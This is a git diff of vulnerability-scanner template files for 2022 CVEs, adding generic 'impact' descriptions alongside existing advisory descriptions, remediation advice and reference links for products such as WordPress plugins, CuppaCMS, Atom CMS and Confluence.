+++ b/http/cves/2022/CVE-2022-2546.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress All-in-One WP Migration plugin 7.62 and prior contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the target website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress All-in-One WP Migration plugin (7.63 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index 95d0ac2445..69a00cdd09 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -6,6 +6,8 @@ info: severity: high description: | ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information. remediation: | Upgrade to a patched version of ThinkPHP or apply the necessary security patches. reference: diff --git a/http/cves/2022/CVE-2022-25485.yaml b/http/cves/2022/CVE-2022-25485.yaml index 9345261d3c..e5c1cad124 100644 --- a/http/cves/2022/CVE-2022-25485.yaml +++ b/http/cves/2022/CVE-2022-25485.yaml @@ -6,6 +6,8 @@ info: severity: high description: | CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the vendor-provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-25486.yaml b/http/cves/2022/CVE-2022-25486.yaml index 0f93b77498..ff1733be8a 100644 --- a/http/cves/2022/CVE-2022-25486.yaml +++ b/http/cves/2022/CVE-2022-25486.yaml @@ -6,6 +6,8 @@ info: severity: high description: | CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml index 2bc0823c0b..5d95019502 100644 --- a/http/cves/2022/CVE-2022-25487.yaml +++ b/http/cves/2022/CVE-2022-25487.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Fixed in version Atom CMS v2.1 reference: - https://packetstormsecurity.com/files/166532/Atom-CMS-1.0.2-Shell-Upload.html diff --git a/http/cves/2022/CVE-2022-25488.yaml b/http/cves/2022/CVE-2022-25488.yaml index 59bba62233..9444742781 100644 --- a/http/cves/2022/CVE-2022-25488.yaml +++ b/http/cves/2022/CVE-2022-25488.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version Atom CMS v2.1 reference: - https://github.com/thedigicraft/Atom.CMS/issues/257 diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml index 42ce0126ee..6009a4c2ff 100644 --- a/http/cves/2022/CVE-2022-25489.yaml +++ b/http/cves/2022/CVE-2022-25489.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the "A" parameter in /widgets/debug.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version Atom CMS v2.1 reference: - https://github.com/thedigicraft/Atom.CMS/issues/258 diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml index 4984429de6..e947d80d35 100644 --- a/http/cves/2022/CVE-2022-25497.yaml +++ b/http/cves/2022/CVE-2022-25497.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index 24ff5db36a..440c10f6ad 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized actions on the affected WordPress site. remediation: Fixed in version 1.4.7.1. reference: - https://wpscan.com/vulnerability/f27d753e-861a-4d8d-9b9a-6c99a8a7ebe0 diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 34ce701b43..9d975dbdb3 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Anti-Malware Security and Brute-Force Firewall plugin before 4.21.83 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in an admin dashboard. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the targeted WordPress site, potentially leading to unauthorized access, data theft, or further attacks. remediation: | Update the WordPress Anti-Malware Security and Brute-Force Firewall plugin to version 4.21.83 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index ec36fc432b..1c712d60ee 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index a8ec7b7274..70db9d5eeb 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Confluence instance. remediation: | Update the Atlassian Questions For Confluence plugin to the latest version, which removes the hardcoded credentials. reference: diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index 82ff1df4ce..b51eaef5b5 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address. + impact: | + An attacker can obtain sensitive credentials, leading to unauthorized access and potential data breaches. remediation: | Update to the latest version of the Grafana & Zabbix Integration plugin to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-26159.yaml b/http/cves/2022/CVE-2022-26159.yaml index 5c266301bc..4bde7efea9 100644 --- a/http/cves/2022/CVE-2022-26159.yaml +++ b/http/cves/2022/CVE-2022-26159.yaml @@ -5,6 +5,8 @@ info: author: Remi Gascou (podalirius) severity: medium description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. + impact: | + The vulnerability can lead to the exposure of sensitive data, such as user credentials or system configuration. remediation: | Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS. reference: diff --git a/http/cves/2022/CVE-2022-26233.yaml b/http/cves/2022/CVE-2022-26233.yaml index 16d52cf675..5662594e95 100644 --- a/http/cves/2022/CVE-2022-26233.yaml +++ b/http/cves/2022/CVE-2022-26233.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml index 804c77b987..76bbc04cb6 100644 --- a/http/cves/2022/CVE-2022-26263.yaml +++ b/http/cves/2022/CVE-2022-26263.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Yonyou U8 13.0 application. reference: diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index 16c083034d..dd1abcfa31 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 12 reference: - https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea diff --git a/http/cves/2022/CVE-2022-2633.yaml b/http/cves/2022/CVE-2022-2633.yaml index e34f752428..48fe16b622 100644 --- a/http/cves/2022/CVE-2022-2633.yaml +++ b/http/cves/2022/CVE-2022-2633.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server. + impact: | + An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access, data leakage, or further attacks. remediation: | Update to the latest version of the All-In-One Video Gallery plugin (2.6.0) or apply the vendor-provided patch to fix the SSRF vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml index 4a1b284190..b12d81653f 100644 --- a/http/cves/2022/CVE-2022-26352.yaml +++ b/http/cves/2022/CVE-2022-26352.yaml @@ -5,6 +5,8 @@ info: author: h1ei1 severity: critical description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index d924426d4a..22a09f1fb3 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml index 5f11e1487b..18892e69a2 100644 --- a/http/cves/2022/CVE-2022-26833.yaml +++ b/http/cves/2022/CVE-2022-26833.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An improper authentication vulnerability exists in the REST API functionality of Open Automation Software OAS Platform V16.00.0121. A specially-crafted series of HTTP requests can lead to unauthenticated use of the REST API. An attacker can send a series of HTTP requests to trigger this vulnerability. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the affected system. remediation: | Apply the latest security patch or update to the Open Automation Software OAS Platform V16.00.0121 to fix the missing authentication issue. reference: diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml index bf002511fb..f56a1496c0 100644 --- a/http/cves/2022/CVE-2022-26960.yaml +++ b/http/cves/2022/CVE-2022-26960.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade elFinder to version 2.1.61 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index 87678c5c1d..bbdc7cc5e9 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Openemr to version 7.0.0.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index 97898c991a..8cf55d2f37 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Kavita before 0.5.4.1 is susceptible to server-side request forgery in GitHub repository kareadita/kavita. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further attacks. remediation: Fixed in 0.5.4.1. reference: - https://huntr.dev/bounties/95e7c181-9d80-4428-aebf-687ac55a9216/ diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index 8ce344b44c..daeeefb3ba 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | QNAP QTS Photo Station External Reference is vulnerable to local file inclusion via an externally controlled reference to a resource vulnerability. If exploited, this could allow an attacker to modify system files. The vulnerability is fixed in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Apply the latest security patches and updates provided by QNAP to fix the local file inclusion vulnerability in QTS Photo Station. reference: diff --git a/http/cves/2022/CVE-2022-27849.yaml b/http/cves/2022/CVE-2022-27849.yaml index a8ad2e74d7..fed0d69637 100644 --- a/http/cves/2022/CVE-2022-27849.yaml +++ b/http/cves/2022/CVE-2022-27849.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or private messages. remediation: | Update to the latest version of the WordPress Simple Ajax Chat plugin to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml index be1e1d9a6e..6b8dfcf6bd 100644 --- a/http/cves/2022/CVE-2022-27926.yaml +++ b/http/cves/2022/CVE-2022-27926.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Zimbra to fix the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-27927.yaml b/http/cves/2022/CVE-2022-27927.yaml index d38b2d17bf..f8f7b54a66 100644 --- a/http/cves/2022/CVE-2022-27927.yaml +++ b/http/cves/2022/CVE-2022-27927.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Microfinance Management System 1.0 is susceptible to SQL Injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Microfinance Management System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml index 301c987633..ff3cc8506f 100644 --- a/http/cves/2022/CVE-2022-27984.yaml +++ b/http/cves/2022/CVE-2022-27984.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system. remediation: | Apply the latest patch or upgrade to a newer version of Cuppa CMS that addresses the SQL injection vulnerability (CVE-2022-27984). reference: diff --git a/http/cves/2022/CVE-2022-27985.yaml b/http/cves/2022/CVE-2022-27985.yaml index f274d866c0..4a9d4b74c0 100644 --- a/http/cves/2022/CVE-2022-27985.yaml +++ b/http/cves/2022/CVE-2022-27985.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-28022.yaml b/http/cves/2022/CVE-2022-28022.yaml index d9126347b0..f89b6153b5 100644 --- a/http/cves/2022/CVE-2022-28022.yaml +++ b/http/cves/2022/CVE-2022-28022.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application. reference: diff --git a/http/cves/2022/CVE-2022-28023.yaml b/http/cves/2022/CVE-2022-28023.yaml index 7da35ae1ea..deca3251d6 100644 --- a/http/cves/2022/CVE-2022-28023.yaml +++ b/http/cves/2022/CVE-2022-28023.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_supplier. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index c04fcdd3a1..2c36a5e0c3 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | AtomCMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_ajax_pages.php + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version Atom CMS v2.1 reference: - https://github.com/thedigicraft/Atom.CMS/issues/263 diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml index 858d89bd3d..d3146c6609 100644 --- a/http/cves/2022/CVE-2022-28079.yaml +++ b/http/cves/2022/CVE-2022-28079.yaml @@ -6,6 +6,8 @@ info: severity: high description: | College Management System 1.0 contains a SQL injection vulnerability via the course code parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml index 83972dfea0..e3dbd05ae0 100644 --- a/http/cves/2022/CVE-2022-28080.yaml +++ b/http/cves/2022/CVE-2022-28080.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Royal Event is vulnerable to a SQL injection vulnerability. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire database. remediation: | To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks. reference: diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml index beb56904e7..6171fb61c0 100644 --- a/http/cves/2022/CVE-2022-28117.yaml +++ b/http/cves/2022/CVE-2022-28117.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Navigate CMS 2.9.4 is susceptible to server-side request forgery via feed_parser class. This can allow a remote attacker to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter, thus enabling possible theft of sensitive information, data modification, and/or unauthorized operation execution. + impact: | + An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks. remediation: | Upgrade to a patched version of Navigate CMS or apply the vendor-provided patch to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index ce05439af3..751662f400 100644 --- a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml @@ -7,6 +7,8 @@ info: description: | Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an unauthenticated XML entity injection attack that can lead to remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code or perform remote code execution on the affected system. remediation: | Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus is configured with a dedicated service account with restricted privileges. diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml index e791036057..b520089e76 100644 --- a/http/cves/2022/CVE-2022-28290.yaml +++ b/http/cves/2022/CVE-2022-28290.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Country Selector plugin prior to 1.6.6 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the country and lang parameters before outputting them back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update WordPress Country Selector plugin to version 1.6.6 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index 6b43c14b9a..5380434fad 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Reprise License Manager or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index 066d5981a2..8d464677fc 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Reprise License Manager 14.2 is susceptible to information disclosure via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. An attacker can possibly obtain further sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Reprise License Manager. reference: diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml index 4addfe0c88..104ac39b33 100644 --- a/http/cves/2022/CVE-2022-2863.yaml +++ b/http/cves/2022/CVE-2022-2863.yaml @@ -5,6 +5,8 @@ info: author: tehtbl severity: medium description: WordPress WPvivid Backup version 0.9.76 is vulnerable to local file inclusion because the plugin does not sanitize and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation. remediation: Upgrade to version 0.9.76 or later. reference: - https://seclists.org/fulldisclosure/2022/Oct/0 diff --git a/http/cves/2022/CVE-2022-28923.yaml b/http/cves/2022/CVE-2022-28923.yaml index 9ab49b3e68..f00b1a8541 100644 --- a/http/cves/2022/CVE-2022-28923.yaml +++ b/http/cves/2022/CVE-2022-28923.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Caddy 2.4.6 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site via a crafted URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability could lead to phishing attacks, credential theft,. remediation: | Upgrade Caddy to version 2.4.7 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index 0de3fec4bc..91f91b46cd 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ -6,6 +6,8 @@ info: severity: high description: | D-Link DIR-816L_FW206b01 is susceptible to improper access control. An attacker can access folders folder_view.php and category_view.php and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or control of the affected router. remediation: | Apply the latest firmware update provided by D-Link to fix the access control issue. reference: diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml index b27eb7de21..64914c19af 100644 --- a/http/cves/2022/CVE-2022-29004.yaml +++ b/http/cves/2022/CVE-2022-29004.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Diary Management System 1.0 contains a cross-site scripting vulnerability via the Name parameter in search-result.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml index aef3eaf8aa..dead2ee9d0 100644 --- a/http/cves/2022/CVE-2022-29005.yaml +++ b/http/cves/2022/CVE-2022-29005.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Online Birth Certificate System 1.2 contains multiple stored cross-site scripting vulnerabilities in the component /obcs/user/profile.php, which allows an attacker to execute arbitrary web script or HTML via a crafted payload injected into the fname or lname parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml index 553ff2e73c..e7dce1d007 100644 --- a/http/cves/2022/CVE-2022-29006.yaml +++ b/http/cves/2022/CVE-2022-29006.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Directory Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context 